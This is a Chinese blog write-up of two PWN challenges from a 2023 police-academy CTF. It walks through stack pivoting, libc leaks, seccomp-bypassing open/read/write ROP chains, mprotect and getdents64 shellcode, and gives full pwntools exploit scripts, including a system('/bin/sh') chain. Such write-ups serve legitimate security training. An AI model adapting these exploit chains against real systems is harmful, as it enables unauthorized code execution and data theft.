2023黄河流域公安院校网络空间安全技能挑战赛 PWN

已于 2023-03-20 20:48:39 修改
阅读量403 收藏 2
点赞数
文章标签: 安全 linux 网络
于 2023-03-20 19:52:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69107736/article/details/129674552
版权

SandBox

链接:https://pan.baidu.com/s/1l3NhZ1xYwca48nf1p88iDg
提取码:05zg

题目开启了沙箱机制

沙箱(Sandbox)是程序运行过程中的一种隔离机制,其目的是限制不可信进程和不可信代码的访问权限。计算机领域的虚拟技术,常见于安全方向。会禁用一些系统调用

实现沙箱机制

  • 一种采用prctl函数调用

  • 一种是使用seccomp库函数。

grxer@grxer ~/D/p/police-pwn-2023> checksec sandbox
[*] '/home/grxer/Desktop/pwn/police-pwn-2023/sandbox'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
grxer@grxer ~/D/p/police-pwn-2023> seccomp-tools dump ./sandbox
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x06 0x00 0x00 0x00000000  return KILL

可以看到禁用了execve系统调用,同时system是不能使用的,因为system是glibc中的函数,用shell来调用程序=fork+exec+waitpid

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [rsp+0h] [rbp-50h] BYREF

  io(argc, argv, envp);
  puts("A bit small, but it doesn't affect me cat flag");
  return read(0, buf, 0x60uLL);
}

栈迁移

只有0x10个字节的大小,我们先进行栈迁移

选择bss=0x404500

  • 我们先payload=padding+p64(bss)+p64(read_ret),由于是采用leave ret平栈,会把rbp改为bss地址,ret 到read

    • 在这里插入图片描述

  • payload=padding+p64(bss+0x50)+p64(read_ret),我们在bss-0x50输入

    • 在这里插入图片描述

  • 平栈后我们的rsp为0x404510(因为在leave mov esp,ebp后需要pop rbp和ret栈顶rsp会提高0x10),rbp为0x404550,再次返回read

    • 在这里插入图片描述

  • payload=p64(bss+0x60)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)会在bss输入payload

    • 在这里插入图片描述

  • 这里我们call read函数时会把返回地址放在0x404508处,我们把他覆盖为了pop rdi ;ret,所以在返回时就可以输出got表返回main

    • 在这里插入图片描述

  • 这样我们就可以返回main,再次循环利用迁移和覆盖read返回

ORW读取flag

对于32位程序,应调用int $0x80进入系统调用,将系统调用号传入eax,各个参数按照ebx、ecx、edx的顺序传递到寄存器中,系统调用返回值储存到eax寄存器。

对于64位程序,应调用 syscall进入系统调用,将系统调用号传入rax,各个参数按照rdi、rsi、rdx的顺序传递到寄存器中,系统调用返回值储存到rax寄存器。

从使用上来看

  • 约定的传递参数的寄存器不同
    • syscall 使用的是 edi 、 esi 、 edx 、 ecx,
    • int 0x80 使用的是 ebx 、 ecx 、 edx 、 esi 、 edi

从内部机制来看

  • syscall 调用的是C库函数,是在用户空间的,并且最终还是会调用内核函数(入口点)
  • int 0x80 调用的是内核函数,是在内核空间的

我们先把‘./flag’字符串通过read函数写入内存payload=b’deadbeef’+p64(rdi)+p64(0)+p64(rsi_r15)+p64(0x404900)+p64(0x40)+p64(read_addr)+p64(main)

三个文件描述符

0 标准输入stdin

1 标志输出 stdout

2 标志错误 stderr

在利用标准库里的syscall打开flag文件,read读取到内存

payload=b’deadbeef’+p64(rdi)+p64(0x2)+p64(pop_rsi)+p64(0x404900)+p64(base+libc.sym[‘syscall’])
payload+=p64(rdi)+p64(3)+p64(pop_rsi)+p64(0x404900)+p64(base+libc.sym[‘read’])+p64(main)

syscall汇编如下

在这里插入图片描述

会把rdi rsi rdx等,依次给到rax rdi rsi等 再内核函数syscall系统调用

open打开文件描述符需要提供给read函数,一般都是从3开始(012被标志占用)

最后读取flag到标准输出,payload=b’deadbeef’+p64(rdi)+p64(1)+p64(rsi_r15)+p64(0x404900)+p64(0x100)+p64(base+libc.sym[‘write’])+p64(main)

拿到flag

在这里插入图片描述

EXP

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./sandbox'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
libc= ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args['REMOTE']:
    io = remote('1.13.251.106','8004')
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))
# db('b *0x401214')
rdi=0x401283
rsi_r15=0x0401281 
read_ret=0x4011F1
bss=0x404500
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=elf.symbols['main']

padding=b'a'*0x50
payload=padding+p64(bss)+p64(read_ret)
sa(b'flag\n',payload)
payload=padding+p64(bss+0x50)+p64(read_ret)
sa(b'flag\n',payload)
p('main',main)
payload=b'deadbeef'+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sa(b'flag\n',payload)
puts_ad=u64(r(6).ljust(8,b'\x00'))
p("puts_ad",puts_ad)

base=puts_ad-libc.symbols['puts']
read_addr = base + libc.symbols['read']
pop_rsi = base + next(libc.search(asm('pop rsi;ret;')))
mprotect = base + libc.sym['mprotect']
p('read_addr',read_addr)
padding=b'b'*0x50
payload=padding+p64(bss)+p64(read_ret)
sa(b'flag\n',payload)
payload=padding+p64(bss+0x50)+p64(read_ret)
sa(b'flag\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(0)+p64(rsi_r15)+p64(0x404900)+p64(0x40)+p64(read_addr)+p64(main)
sa(b'flag\n',payload)
sleep(1)
s('./flag')

padding=b'c'*0x50
payload=padding+p64(bss)+p64(read_ret)
sa(b'flag\n',payload)
payload=padding+p64(bss+0x50)+p64(read_ret)
sa(b'flag\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(0x2)+p64(pop_rsi)+p64(0x404900)+p64(base+libc.sym['syscall'])
payload+=p64(rdi)+p64(3)+p64(pop_rsi)+p64(0x404900)+p64(base+libc.sym['read'])+p64(main)
sa(b'flag\n',payload)


padding=b'd'*0x50
payload=padding+p64(bss)+p64(read_ret)
sa(b'flag\n',payload)
payload=padding+p64(bss+0x50)+p64(read_ret)
sa(b'flag\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(1)+p64(rsi_r15)+p64(0x404900)+p64(0x100)+p64(base+libc.sym['write'])+p64(main)

sa(b'flag\n',payload)
io.interactive()

flag???

链接:https://pan.baidu.com/s/1kHoiI7gXN0RLVzY1q7RPng
提取码:pdi2

grxer@grxer ~/D/p/police-pwn-2023> checksec pwn3
[*] '/home/grxer/Desktop/pwn/police-pwn-2023/pwn3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[96]; // [rsp+0h] [rbp-60h] BYREF

  io(argc, argv, envp);
  puts(s);
  return read(0, buf, 0x70uLL);
}

和sandbox一样,只有0x10字节的溢出,seccomp-tools检测了一下并没有沙箱,简简单单拿个shellZzz,直接栈迁移ROP

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./flag???'
libc= ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))

db('b *0x40120E')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=elf.symbols['main']
rdi=0x0000000000401283
rsi_r15=0x0000000000401281
bss=0x404500
read_ret=0x4011F1

padding=b'a'*0x60
payload=padding+p64(bss)+p64(read_ret)
sa(b'\n',payload)
payload=padding+p64(bss+0x60)+p64(read_ret)
sa(b'\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sa(b'\n',payload)
puts_ad=u64(r(6).ljust(8,b'\x00'))
p('puts_ad',puts_ad)
base=puts_ad-libc.symbols['puts']
system_ad=base+libc.symbols['system']
bin_sh=base+next(libc.search(b'/bin/sh'))
padding=b'b'*0x60
payload=padding+p64(bss)+p64(read_ret)
sa(b'\n',payload)
payload=padding+p64(bss+0x60)+p64(read_ret)
sa(b'\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(bin_sh)+p64(0x000000000040101a)+p64(system_ad)
sa(b'\n',payload)

io.interactive()

发现没有拿到shell

在这里插入图片描述

gdb跟了一下发现会执行到system(‘/bin/sh’),又是开了沙箱,没有检测出来,发现题目给了提示有沙箱

mprotect修改权限

在Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。

函数原型如下:

#include <unistd.h>
#include <sys/mmap.h>必须是一个内存页的起始地址
int mprotect(const void *start, size_t len, int prot);
从start开始修改len长度byte的权限为prot
* start必须从必须是一个内存页的起始地地址 linux页一般4k(0x1000byte)
* len必须是页整数倍
* part和linux文件权限一样 RWX

我们需要先泄露文件名,看到要写入shellcode,这一步是必要的

payload=b’deadbeef’+p64(rdi)+p64(mp_start)+p64(poprsi)+p64(4096)+p64(poprdx_r12)+p64(0x7)+p64(0x6666)+p64(mprotect)+p64(main)

在这里插入图片描述

修改完成rwx

getdents64泄露文件名

getdents64函数,它读取目录文件中的一个个目录项并返回

  • 参数一:fd指针
  • 参数二:写入的内存区域
  • 参数三:4096
  • 功能:把当前文件目录下的文件名写入参数二指向的内存区域

linux ls底层是调用getdents64函数实现的

我们用stace跟踪一些ls

strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器。我们用它来监控用户空间进程和内核的交互,比如系统调用、信号传递、进程状态变更等。

ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=49, ws_col=102, ws_xpixel=1632, ws_ypixel=1568}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
newfstatat(3, "", {st_mode=S_IFDIR|0777, st_size=4096, ...}, AT_EMPTY_PATH) = 0
getdents64(3, 0x55c4e28daac0 /* 23 entries */, 32768) = 800
getdents64(3, 0x55c4e28daac0 /* 0 entries */, 32768) = 0
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
write(1, "bjdctf_2020_babystack\t  flag.txt"..., 67) = 67
write(1, "bjdctf_2020_babystack.py  get_st"..., 72) = 72
write(1, "ciscn_2019_c_1\t\t  get_started_3d"..., 72) = 72
write(1, "core\t\t\t  get_started_3dsctf_2016"..., 68) = 68
write(1, "ctest\t\t\t  IDA\t\t\t\t       payload."..., 51) = 51
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++

payload=b'deadbeef'+p64(rdi)+p64(0)+p64(poprsi)+p64(mp_start+0x200)+p64(poprdx_r12)+p64(0x200)+p64(0x66666)+p64(read_ad)+p64(mp_start+0x200)
sa(b'\x96\x88\n',payload)
payload=asm(shellcraft.open('./'))
payload+=asm(shellcraft.getdents64(3, mp_start+0x100, 0x200))
payload+=asm(shellcraft.write(1,mp_start+0x100,0x200))
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' %(main))
sleep(1)
s(payload)

打开当前文件夹,然后读取到指定内存后通过write输出,这里的第一个payload数据的写入区最后选择bss段中间位置如mp_start+0x200,开头部分可能不行,官方wp

mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;来返回,我感觉mov rsi, 0x%x;push rsi; ret;就可以,也打通了,不知道为什么要多一层syscall

payload=asm(shellcraft.open(flagname))
payload+=asm(shellcraft.read(4,mp_start+0x100,0x200))
payload+=asm(shellcraft.write(1,mp_start+0x100,0x200))

泄露出文件名,正常读取就可以,因为我们没有关闭前一个打开的fd指针,所以这里文件指针变为4

在这里插入图片描述

EXP 这里其实可以封装个函数,懒得搞了

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./grxer???'
libc= ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote()
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))

db('b *0x40120E')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=elf.symbols['main']
rdi=0x0000000000401283
rsi_r15=0x0000000000401281
bss=0x404500
read_ret=0x4011F1

padding=b'a'*0x60
payload=padding+p64(bss)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=padding+p64(bss+0x60)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sa(b'\x96\x88\n',payload)
puts_ad=u64(r(6).ljust(8,b'\x00'))
p('puts_ad',puts_ad)
base=puts_ad-libc.symbols['puts']
system_ad=base+libc.symbols['system']

bin_sh=base+next(libc.search(b'/bin/sh'))
poprdi=next(libc.search(asm('pop rdi;ret;')))+base
poprsi=next(libc.search(asm('pop rsi;ret;')))+base
poprdx_r12=next(libc.search(asm('pop rdx;pop r12;ret;')))+base
p('poprdi',poprdi)
p('poprsi',poprsi)
p('poprdx',poprdx_r12)
mprotect=libc.symbols['mprotect']+base
read_ad=libc.symbols['read']+base
mp_start=0x404000

padding=b'b'*0x60
payload=padding+p64(bss+0x100)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=padding+p64(bss+0x60+0x100)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(mp_start)+p64(poprsi)+p64(4096)+p64(poprdx_r12)+p64(0x7)+p64(0x6666)+p64(mprotect)+p64(main)
sa(b'\x96\x88\n',payload)

padding=b'c'*0x60
payload=padding+p64(bss+0x200)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=padding+p64(bss+0x60+0x200)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(0)+p64(poprsi)+p64(mp_start+0x200)+p64(poprdx_r12)+p64(0x200)+p64(0x66666)+p64(read_ad)+p64(mp_start+0x200)
sa(b'\x96\x88\n',payload)
payload=asm(shellcraft.open('./'))
payload+=asm(shellcraft.getdents64(3, mp_start+0x100, 0x200))
payload+=asm(shellcraft.write(1,mp_start+0x100,0x200))
payload += asm('''
        mov rsi, 0x%x;push rsi; ret;
        ''' %(main))
sleep(1)
s(payload)

ru(b'flag')
flag=r(6)
print('flag--->'+flag.decode())
flagname='./flag'+flag.decode()
print(flagname)
padding=b'd'*0x60
payload=padding+p64(bss)+p64(read_ret)
# sa(b'\x96\x88\n\n',payload)
s(payload)
payload=padding+p64(bss+0x60)+p64(read_ret)
sa(b'\x96\x88\n',payload)
payload=b'deadbeef'+p64(rdi)+p64(0)+p64(poprsi)+p64(mp_start+0x200)+p64(poprdx_r12)+p64(0x200)+p64(0x66666)+p64(read_ad)+p64(mp_start+0x200)
sa(b'\x96\x88\n',payload)
payload=asm(shellcraft.open(flagname))
payload+=asm(shellcraft.read(4,mp_start+0x100,0x200))
payload+=asm(shellcraft.write(1,mp_start+0x100,0x200))
sleep(1)
s(payload)
io.interactive()
Grxer
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黄河流域公安院校网络空间安全技能挑战赛】部分wp
leekos的博客,分享web安全相关知识~
03-07 936
黄河流域公安院校网络空间安全技能挑战赛】部分wp
黄河流域公安院校网络空间安全技能挑战赛
qq_63928796的博客
03-04 400
里让b为真就可以调用c中的sdpc方法,参数是welcom,再利用A类可以调用Evil中的getflag。将一句话木马包含在日志里并写到test.php中。php7.4有一个源码泄露的漏洞。pearcmd的利用,日志包含。考察PHP 的运算符比较级。
黄河流域公安院校网络空间安全技能挑战赛 QAQ 题解
OrientalGlass的博客
03-05 646
这题是对python打包成的可执行程序逆向。
网络空间安全中高职业院校职技能大赛——信息安全WordPress解题
Jay
12-21 273
通过wpscan –url http://172.16.100.11:7904 –enumerate u。用这个账号登录后台,漏洞点在media ,文件上传漏洞。IIS7 是我上传的图片,名是3.jpg。找到jerry/qwerty用户名密码。
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1965
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
2022年中职网络安全竞赛天津市赛任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
“东华杯”2021年大学生网络安全邀请赛.zip
12-07
"东华杯"2021年大学生网络安全邀请赛是一场旨在提高大学生网络安全技能和意识的重要赛事。CTF,即Capture The Flag,是网络安全领域的一种竞赛形式,参赛者需要运用各种安全技能解决难题,捕获特定的目标("flag")...
2024年首届茂名市网络安全比赛(茂安杯)初赛部分题目,有crypto、misc、reverse、pwn和moblie的题
08-08
适合ctf爱好者或者参加相关茂名市网安比赛的选手观阅,题目简单蛮适合拿来练手的。
多线程内存问题分析之mprotect方法
11-19 2164
http://www.yebangyu.org/blog/2016/02/01/detectmemoryghostinmultithread/ 多线程中的内存问题,一直被认为是噩梦般的存在,几乎只有高手、大仙才能解决。除了大量的打log、gdb调试、code review以及依靠多年的经验和直觉之外,有没有一些分析的手段和工具呢?答案是肯定的。本文首先介绍其中的一种:mprote
BUU PWN(一)
playmaker的博客
01-28 2119
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUU-pwn(六)
qq_53263789的博客
09-14 218
BUU-pwn(六)
buuctf(pwn
个人笔记
04-04 2685
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
如何写一个Android inline hook框架
DaoDivDiFang的博客
01-02 1553
Android_Inline_Hook https://github.com/GToad/Android_Inline_Hook_ARM64 有32和64的实现,但是是分离的,要用的话还要自己把两份代码合并在一起。 缺点: 1、不支持函数替换(即hook后不执行原函数),现在只能修改参数寄存器,无法修改返回值。 2、不支持定义同类型的hook函数来接受处理参数,只能通过修改寄存器的方式修改参数。 ...
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 940
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
DLMS/COSEM中的信息安全安全密钥(中)
最新发布
huaqianzkh的专栏
08-09 635
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1463
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
CC攻击解决方案,如何处理CC攻击
dexunyun的博客
08-09 777
CC攻击作为网络世界中的一大威胁,对网站的安全与稳定构成了严峻挑战。然而,通过部署安全加速SCDN,我们可以有效应对CC攻击,确保网站的安全与稳定。作为网络管理员和网站拥有者,我们应时刻保持警惕,不断提升自身的安全防护能力,为用户提供更加安全、可靠的网络服务。
2021强网杯网络安全挑战赛Nu1L Team Writeup分析
"2021强网杯Writeup--by Nu1L Team.pdf" 是一份关于第五届“强网杯”全国网络安全挑战赛的赛后分析报告,由Nu1L团队编写。报告涵盖了多个网络安全领域的挑战,包括CTF(Capture The Flag)竞赛、网络安全和信息安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值